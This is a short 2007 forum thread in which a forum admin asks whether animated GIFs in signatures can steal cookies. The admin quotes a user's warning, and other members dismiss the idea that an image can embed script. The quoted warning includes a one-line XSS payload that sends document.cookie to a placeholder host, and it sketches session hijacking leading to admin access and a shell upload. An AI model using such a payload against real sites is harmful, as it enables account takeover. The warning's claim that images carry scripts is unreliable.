Simple Machines Community Forum

Topic started by: jbryant on January 17, 2007, 05:41:23 AM

Title: animated gifs dangerous?
Post by: jbryant on January 17, 2007, 05:41:23 AM
Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be implemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you don't know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) wipe everything and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if an admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause it's soooooooooo much danger.



How do I disable the gif in the signature if this is true?
Thank you in advance.
Title: Re: animated gifs dangerous?
Post by: Dannii on January 17, 2007, 05:56:01 AM
Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
Title: Re: animated gifs dangerous?
Post by: Daniel15 on January 17, 2007, 07:44:04 AM
You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a separate JavaScript to do so (I could be wrong, though)

Quote:
admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that
Sounds like a script kiddie to me :-\
Title: Re: animated gifs dangerous?
Post by: webvision on January 17, 2007, 08:48:51 AM
I think animated or simple images both are equal.